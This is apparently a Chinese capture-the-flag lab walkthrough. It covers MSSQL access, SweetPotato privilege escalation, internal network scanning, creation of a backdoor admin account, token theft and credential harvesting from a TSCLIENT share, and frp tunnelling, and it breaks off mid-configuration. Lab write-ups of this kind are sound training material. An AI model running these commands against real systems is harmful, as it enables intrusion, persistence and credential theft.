春秋云镜Tsclient

春秋云镜
,

mssql

先下载fscan扫一下,这个是一个Windows靶机,下载exe即可

1
2
.\fscan.exe -h 39.98.109.127 -p 1-65535

扫出来一个mssql安装工具进行连接

下载第一个 我是1.8所以直接就链接了

1
java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

1

whoami查看权限很低,上传SweetPotato 下载第一个 执行命令

1
C:/迅雷下载/SweetPotato.exe -a whoami

得到权限了直接去看C:/Users/Administrator/

1
2
3
C:/迅雷下载/SweetPotato.exe -a "dir C:\Users\Administrator\"
C:/迅雷下载/SweetPotato.exe -a "dir C:\Users\Administrator\flag\"
C:/迅雷下载/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"

然后我们就可以进内网了

内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
C:/迅雷下载/SweetPotato.exe -a "ipconfig"

C:/迅雷下载/SweetPotato.exe -a "C:\迅雷下载\fscan.exe -h 172.22.8.18/24"
Modifying SweetPotato by Uknow to support webshell
Github: https://github.com/uknowsec/SweetPotato 
SweetPotato by @_EthicalChaos_
Original RottenPotato code and exploit by @foxglovesec
Weaponized JuicyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n

[+] Attempting NP impersonation using method PrintSpoofer to launch c:\Windows\System32\cmd.exe
[+] Triggering notification on evil PIPE \\WIN-WEB/pipe/20cbde11-b9fd-41d3-b6f2-b42a5bb2829f
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] CreatePipe success
[+] Command: "c:\Windows\System32\cmd.exe" /c C:\Ѹ������\fscan.exe -h 172.22.8.18/24 
[+] Process with PID: 6976 created.

=====================================

start infoscan

(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive

[*] Icmp alive hosts len is: 4

172.22.8.31:135 open
172.22.8.46:135 open
172.22.8.18:139 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.15:139 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open

[*] Alive ports len is: 16

start vulscan

[*] NetInfo 
[*] 172.22.8.18
   [->] WIN-WEB
   [->] 172.22.8.18
   [->] 2001:0:348b:fb58:83f:175d:d89d:9280

[*] NetInfo 
[*] 172.22.8.31
   [->] WIN19-CLIENT
   [->] 172.22.8.31

[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT

[*] NetInfo 
[*] 172.22.8.15
   [->] DC01
   [->] 172.22.8.15

[*] NetInfo 
[*] 172.22.8.46
   [->] WIN2016
   [->] 172.22.8.46

[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01

[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393

[*] WebTitle http://172.22.8.46 code: 200 len: 703 title: IIS Windows Server
[*] WebTitle http://172.22.8.18 code: 200 len: 703 title: IIS Windows Server

[+] mssql 172.22.8.18:1433: sa 1qaz!QAZ

Scan finished 16/16

[*] Scan completed, elapsed time: 10.0628104s

[+] Process created, enjoy!

情况如下

  1. 172.22.8.15 域控
  2. 172.22.8.31 域内机器
  3. 172.22.8.18 已拿下
  4. 172.22.8.46 域内机器

看一下用户

1
2
3
4
5
6
7
C:/迅雷下载/SweetPotato.exe -a "net user"

Administrator            
DefaultAccount           
Guest 

John

看网络

1
C:/迅雷下载/SweetPotato.exe -a "netstat -no"

看到我们现在所在的机器上面的3389和有链接172.22.8.31,也就是一台域内机器,安装SharpToken.exe来拿John的用户 SharpToken.exe

1
2
C:/迅雷下载/SweetPotato.exe -a "C:\迅雷下载\SharpToken.exe execute "WIN-WEB\John" cmd true"
C:/迅雷下载/SweetPotato.exe -a "net use"

根本没有反应,要创建用户远程连接了,创建用户要密码够复杂不然创建会不成功,不用改注册表,改注册表可能还不成功

1
2
C:/迅雷下载/SweetPotato.exe -a "net user test1 12SqweR!@ /add"
C:/迅雷下载/SweetPotato.exe -a "net localgroup administrators test1 /add"

为了方便搞个bat

1
2
3
4
5
6
7
8
9
10
11
12
13
@echo off
rem 设置 Java 8 的路径
SET JAVA8_JRE=C:\Program Files\Java\jdk1.8.0_201\jre\bin
SET JAVA8_JDK=C:\Program Files\Java\jdk1.8.0_201\bin

rem 临时修改 PATH,使 Java 8 的 JDK 和 JRE 生效
SET PATH=%JAVA8_JDK%;%JAVA8_JRE%;%PATH%

rem 运行 JAR 文件
java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

rem 暂停以查看输出
pause

运行mstsc,进行远程连接,链接之后我们要拿John用户,用管理员身份打开cmd

1
SharpToken.exe execute "WIN-WEB\John" cmd true

执行不了,安装.NET3.5即可,搜索“服务器管理器”即可打开

服务器管理器–>管理–>添加角色1 和功能–>功能–>勾选.net3.5进行安装,安装好之后

1
2
3
net use
dir \\TSCLIENT\C
type \\TSCLIENT\C\credential.txt

得到了

1
2
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
Do you know how to hijack Image?

然后登不上要改密码,需要上frps,但是我不会 frps,然后在服务器上面运行

1
./frps -c frps.ini

然后访问服务器的7500端口就登录就好了,windows下载地址,上传进去之后写个frpc.ini

1
2
3
4
5
6
7
8
9
[common]
server_addr = 你的服务器公网IP
server_port = 7000
token = baozongwi123!@

[web]
type = http
local_port = 80
custom_domains = example.com 
1